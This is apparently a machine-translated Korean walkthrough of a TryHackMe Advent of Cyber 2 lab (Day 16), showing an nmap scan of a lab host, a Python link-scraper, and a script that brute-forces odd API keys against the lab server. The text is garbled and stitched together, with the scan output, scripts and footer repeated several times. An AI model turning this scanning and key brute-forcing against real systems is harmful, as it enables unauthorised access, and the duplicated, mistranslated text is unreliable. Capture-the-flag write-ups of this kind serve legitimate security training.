[TryHackMe] Advent of Cyber 2, Day 16 - Walkthrough -
"Advent of Cyber 2"는 "free room"(무료)에서 제공됩니다. 구독 없이 가상 머신을 "배포(Deploy)"할 수 있습니다.
「Advent of Cyber 2」의 Walkthrough 인덱스를 「 [TryHackMe] Advent of Cyber 2에 참여해 보았습니다. 」에서 공개했습니다.
[Day 16] Scripting: Help! Where is Santa?
스토리
무슨 일이야! 산타씨 가 날아 버렸다! 충실한 엘프들을 남겨주세요! 산타의 거처를 찾는데 협력할 수 있을까? 산타가 있는 곳을 찾는 데 도움을 주지 않겠습니까?
다행히 요정들은 OSINT
의 달인으로 몇 가지를 기억합니다. 구체적으로는 다음 사항입니다.
무슨 일이야! 산타씨 가 날아 버렸다! 충실한 엘프들을 남겨주세요! 산타의 거처를 찾는데 협력할 수 있을까? 산타가 있는 곳을 찾는 데 도움을 주지 않겠습니까?
다행히 요정들은
OSINT
의 달인으로 몇 가지를 기억합니다. 구체적으로는 다음 사항입니다.MACHINE_IP/static/index.html
를 가지고 있습니다. 그러나 산타는 웹 서버가 어떤 포트 번호로 작동하는지 엘프들에게 가르치지 않았습니다. 확인할 수 있습니까? - 산타의 썰매(
Santa's Sled
)에는 API
가 있습니다. API
의 키는 0〜100
이며 奇数
입니다. 하지만 조심! 알 수없는 횟수 시도 후 Santa's Sled
는 귀하의 IP 주소를 금지합니다. Santa's Sled
를 실행하는 컴퓨터를 배포하고 대상( MACHINE_IP
)이 시작될 때까지 몇 분 정도 기다립니다. 15일째 파이썬 스킬을 사용하여 API의 올바른 키를 탐색합니다.Day 16 - #1.
What is the port number for the web server?
nmap
를 사용하여 포트 스캔을 수행합니다.
kali@kali:~$ nmap -Pn -T4 -A -vv 10.10.64.46
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-16 22:51 EST
Nmap scan report for 10.10.64.46
Host is up, received user-set (0.26s latency).
Scanned at 2020-12-16 22:51:20 EST for 185s
Not shown: 999 closed ports
Reason: 999 conn-refused
PORT STATE SERVICE REASON VERSION
8000/tcp open http-alt syn-ack uvicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| date: Thu, 17 Dec 2020 03:52:01 GMT
| server: uvicorn
| content-length: 22
| content-type: application/json
| Connection: close
| {"detail":"Not Found"}
| GetRequest:
| HTTP/1.1 200 OK
| date: Thu, 17 Dec 2020 03:51:55 GMT
| server: uvicorn
| content-type: text/html; charset=utf-8
| content-length: 6992
| last-modified: Mon, 23 Nov 2020 00:31:30 GMT
| etag: 43d617909830c0d0a48bbbe8ea26ae39
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <meta charset="utf-8">
| <meta http-equiv="X-UA-Compatible" content="IE=edge">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Santa's Tracker</title>
| <link rel="shortcut icon" href="" type="image/x-icon">
| <link rel="stylesheet" href="bulma.css">
| <!-- Bulma Version 0.9.0-->
| <link rel="stylesheet" type="text/css" href="../css/hero.css">
| <!-- <link rel="stylesheet" href="https://unpkg.com/bulma-modal-fx/dist/css/modal-fx.min.css" /> -->
| </head>
| <body>
| <section class="hero is-info is-medium is-bold">
| HTTPOptions:
| HTTP/1.1 405 Method Not Allowed
| date: Thu, 17 Dec 2020 03:52:07 GMT
| server: uvicorn
| content-length: 31
| content-type: application/json
| Connection: close
|_ {"detail":"Method Not Allowed"}
| http-methods:
|_ Supported Methods: GET
|_http-server-header: uvicorn
|_http-title: Santa's Tracker
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.80%I=7%D=12/16%Time=5FDAD5DA%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,1C40,"HTTP/1\.1\x20200\x20OK\r\ndate:\x20Thu,\x2017\x20Dec\x2
SF:02020\x2003:51:55\x20GMT\r\nserver:\x20uvicorn\r\ncontent-type:\x20text
SF:/html;\x20charset=utf-8\r\ncontent-length:\x206992\r\nlast-modified:\x2
SF:0Mon,\x2023\x20Nov\x202020\x2000:31:30\x20GMT\r\netag:\x2043d617909830c
SF:0d0a48bbbe8ea26ae39\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n
SF:<html>\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x
SF:20charset=\"utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equ
SF:iv=\"X-UA-Compatible\"\x20content=\"IE=edge\">\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x2
SF:0initial-scale=1\">\n\x20\x20\x20\x20\x20\x20\x20\x20<title>Santa's\x20
SF:Tracker</title>\n\x20\x20\x20\x20\x20\x20\x20\x20<link\x20rel=\"shortcu
SF:t\x20icon\"\x20href=\"\"\x20type=\"image/x-icon\">\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"bulma\.css\">\n\x20\
SF:x20\x20\x20\x20\x20\x20\x20<!--\x20Bulma\x20Version\x200\.9\.0-->\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20type=\"text/
SF:css\"\x20href=\"\.\./css/hero\.css\">\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20<!--\x20<link\x20rel=\"stylesheet\"\x20href=\"https://unpkg\.com/bu
SF:lma-modal-fx/dist/css/modal-fx\.min\.css\"\x20/>\x20-->\n\x20\x20\x20\x
SF:20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<sec
SF:tion\x20class=\"hero\x20is-info\x20is-medium\x20is-bold\">\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20")%r(FourOhFourRequest,AD,"HTTP/1\.1\x20404\x20Not
SF:\x20Found\r\ndate:\x20Thu,\x2017\x20Dec\x202020\x2003:52:01\x20GMT\r\ns
SF:erver:\x20uvicorn\r\ncontent-length:\x2022\r\ncontent-type:\x20applicat
SF:ion/json\r\nConnection:\x20close\r\n\r\n{\"detail\":\"Not\x20Found\"}")
SF:%r(HTTPOptions,BF,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\ndate
SF::\x20Thu,\x2017\x20Dec\x202020\x2003:52:07\x20GMT\r\nserver:\x20uvicorn
SF:\r\ncontent-length:\x2031\r\ncontent-type:\x20application/json\r\nConne
SF:ction:\x20close\r\n\r\n{\"detail\":\"Method\x20Not\x20Allowed\"}");
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 185.49 seconds
Santa's Tracking System
Are you an Elf that Santa has forgotten? Use this system to track Santa! Note: due to how many humans try to find where Santa is, the link is hidden on this webpage. You're going to have to manually click every single link Or perhaps there is a way to find all the links as fast as a Python?
Important notice All deliiveries to Skidy for TryHackMe jumpers are to be stopped. That man has asked for 613 on the premise that they are the softest jumper in the world. Please, we need to share them out.
Santa's Tracker
가 실행 중인 포트 번호를 확인할 수 있습니다. 실제로 액세스해 보겠습니다.
http://MACHINE_IP:PORT/static/index.html
"이 웹페이지에는 링크가 숨겨져 있습니다. 매뉴얼에서 모든 링크를 클릭해야 합니다."그리고 "또는 Python처럼 모든 링크를 빠르게 찾을 수있는 방법이있을 수 있습니다."라고.
Day 16 - #2.
Without using enumerations tools such as Dirbuster, what is the directory for the API? (without the API key)
linkgrabber.pyfrom bs4 import BeautifulSoup
import requests
html = requests.get('http://10.10.64.46:8000/static/index.html')
soup = BeautifulSoup(html.text, "lxml")
links = soup.find_all('a')
for link in links:
if "href" in link.attrs:
print(link["href"])
kali@kali:~$ python3 linkgrabber.py | uniq
../
https://github.com/BulmaTemplates/bulma-templates/blob/master/templates/hero.html
https://tryhackme.com
#
http://machine_ip/api/api_key
#
https://github.com/BulmaTemplates/bulma-templates
Day 16 - #3.
Where is Santa right now?
Day 16 - #4.
Find out the correct API key. Remember, this is an odd number between 0-100. After too many attempts, Santa's Sled will block you.
To unblock yourself, simply terminate and re-deploy the target instance
apibruter.pyimport requests
api_key = 1
html = requests.get(f'http://10.10.64.46:8000/api/{api_key}')
print(html.text)
kali@kali:~$ python3 apibruter.py
{"item_id":1,"q":"Error. Key not valid!"}
apibruter_r.pyimport requests
for api_key in range(1,100,2):
print(f"api_key {api_key}")
html = requests.get(f'http://10.10.64.46:8000/api/{api_key}')
print(html.text)
이것으로, 16일째의 미션이 종료입니다.
Reference
이 문제에 관하여([TryHackMe] Advent of Cyber 2, Day 16 - Walkthrough -), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다
https://qiita.com/v_avenger/items/cb0f488e13e9c2385ed9
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념
(Collection and Share based on the CC Protocol.)
kali@kali:~$ nmap -Pn -T4 -A -vv 10.10.64.46
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-16 22:51 EST
Nmap scan report for 10.10.64.46
Host is up, received user-set (0.26s latency).
Scanned at 2020-12-16 22:51:20 EST for 185s
Not shown: 999 closed ports
Reason: 999 conn-refused
PORT STATE SERVICE REASON VERSION
8000/tcp open http-alt syn-ack uvicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| date: Thu, 17 Dec 2020 03:52:01 GMT
| server: uvicorn
| content-length: 22
| content-type: application/json
| Connection: close
| {"detail":"Not Found"}
| GetRequest:
| HTTP/1.1 200 OK
| date: Thu, 17 Dec 2020 03:51:55 GMT
| server: uvicorn
| content-type: text/html; charset=utf-8
| content-length: 6992
| last-modified: Mon, 23 Nov 2020 00:31:30 GMT
| etag: 43d617909830c0d0a48bbbe8ea26ae39
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <meta charset="utf-8">
| <meta http-equiv="X-UA-Compatible" content="IE=edge">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Santa's Tracker</title>
| <link rel="shortcut icon" href="" type="image/x-icon">
| <link rel="stylesheet" href="bulma.css">
| <!-- Bulma Version 0.9.0-->
| <link rel="stylesheet" type="text/css" href="../css/hero.css">
| <!-- <link rel="stylesheet" href="https://unpkg.com/bulma-modal-fx/dist/css/modal-fx.min.css" /> -->
| </head>
| <body>
| <section class="hero is-info is-medium is-bold">
| HTTPOptions:
| HTTP/1.1 405 Method Not Allowed
| date: Thu, 17 Dec 2020 03:52:07 GMT
| server: uvicorn
| content-length: 31
| content-type: application/json
| Connection: close
|_ {"detail":"Method Not Allowed"}
| http-methods:
|_ Supported Methods: GET
|_http-server-header: uvicorn
|_http-title: Santa's Tracker
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.80%I=7%D=12/16%Time=5FDAD5DA%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,1C40,"HTTP/1\.1\x20200\x20OK\r\ndate:\x20Thu,\x2017\x20Dec\x2
SF:02020\x2003:51:55\x20GMT\r\nserver:\x20uvicorn\r\ncontent-type:\x20text
SF:/html;\x20charset=utf-8\r\ncontent-length:\x206992\r\nlast-modified:\x2
SF:0Mon,\x2023\x20Nov\x202020\x2000:31:30\x20GMT\r\netag:\x2043d617909830c
SF:0d0a48bbbe8ea26ae39\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n
SF:<html>\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x
SF:20charset=\"utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equ
SF:iv=\"X-UA-Compatible\"\x20content=\"IE=edge\">\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x2
SF:0initial-scale=1\">\n\x20\x20\x20\x20\x20\x20\x20\x20<title>Santa's\x20
SF:Tracker</title>\n\x20\x20\x20\x20\x20\x20\x20\x20<link\x20rel=\"shortcu
SF:t\x20icon\"\x20href=\"\"\x20type=\"image/x-icon\">\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"bulma\.css\">\n\x20\
SF:x20\x20\x20\x20\x20\x20\x20<!--\x20Bulma\x20Version\x200\.9\.0-->\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20type=\"text/
SF:css\"\x20href=\"\.\./css/hero\.css\">\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20<!--\x20<link\x20rel=\"stylesheet\"\x20href=\"https://unpkg\.com/bu
SF:lma-modal-fx/dist/css/modal-fx\.min\.css\"\x20/>\x20-->\n\x20\x20\x20\x
SF:20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<sec
SF:tion\x20class=\"hero\x20is-info\x20is-medium\x20is-bold\">\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20")%r(FourOhFourRequest,AD,"HTTP/1\.1\x20404\x20Not
SF:\x20Found\r\ndate:\x20Thu,\x2017\x20Dec\x202020\x2003:52:01\x20GMT\r\ns
SF:erver:\x20uvicorn\r\ncontent-length:\x2022\r\ncontent-type:\x20applicat
SF:ion/json\r\nConnection:\x20close\r\n\r\n{\"detail\":\"Not\x20Found\"}")
SF:%r(HTTPOptions,BF,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\ndate
SF::\x20Thu,\x2017\x20Dec\x202020\x2003:52:07\x20GMT\r\nserver:\x20uvicorn
SF:\r\ncontent-length:\x2031\r\ncontent-type:\x20application/json\r\nConne
SF:ction:\x20close\r\n\r\n{\"detail\":\"Method\x20Not\x20Allowed\"}");
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 185.49 seconds
http://MACHINE_IP:PORT/static/index.html
Without using enumerations tools such as Dirbuster, what is the directory for the API? (without the API key)
linkgrabber.py
from bs4 import BeautifulSoup
import requests
html = requests.get('http://10.10.64.46:8000/static/index.html')
soup = BeautifulSoup(html.text, "lxml")
links = soup.find_all('a')
for link in links:
if "href" in link.attrs:
print(link["href"])
kali@kali:~$ python3 linkgrabber.py | uniq
../
https://github.com/BulmaTemplates/bulma-templates/blob/master/templates/hero.html
https://tryhackme.com
#
http://machine_ip/api/api_key
#
https://github.com/BulmaTemplates/bulma-templates
Day 16 - #3.
Where is Santa right now?
Day 16 - #4.
Find out the correct API key. Remember, this is an odd number between 0-100. After too many attempts, Santa's Sled will block you.
To unblock yourself, simply terminate and re-deploy the target instance
apibruter.pyimport requests
api_key = 1
html = requests.get(f'http://10.10.64.46:8000/api/{api_key}')
print(html.text)
kali@kali:~$ python3 apibruter.py
{"item_id":1,"q":"Error. Key not valid!"}
apibruter_r.pyimport requests
for api_key in range(1,100,2):
print(f"api_key {api_key}")
html = requests.get(f'http://10.10.64.46:8000/api/{api_key}')
print(html.text)
이것으로, 16일째의 미션이 종료입니다.
Reference
이 문제에 관하여([TryHackMe] Advent of Cyber 2, Day 16 - Walkthrough -), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다
https://qiita.com/v_avenger/items/cb0f488e13e9c2385ed9
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념
(Collection and Share based on the CC Protocol.)
Find out the correct API key. Remember, this is an odd number between 0-100. After too many attempts, Santa's Sled will block you.
To unblock yourself, simply terminate and re-deploy the target instance
apibruter.py
import requests
api_key = 1
html = requests.get(f'http://10.10.64.46:8000/api/{api_key}')
print(html.text)
kali@kali:~$ python3 apibruter.py
{"item_id":1,"q":"Error. Key not valid!"}
apibruter_r.py
import requests
for api_key in range(1,100,2):
print(f"api_key {api_key}")
html = requests.get(f'http://10.10.64.46:8000/api/{api_key}')
print(html.text)
이것으로, 16일째의 미션이 종료입니다.
Reference
이 문제에 관하여([TryHackMe] Advent of Cyber 2, Day 16 - Walkthrough -), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://qiita.com/v_avenger/items/cb0f488e13e9c2385ed9텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)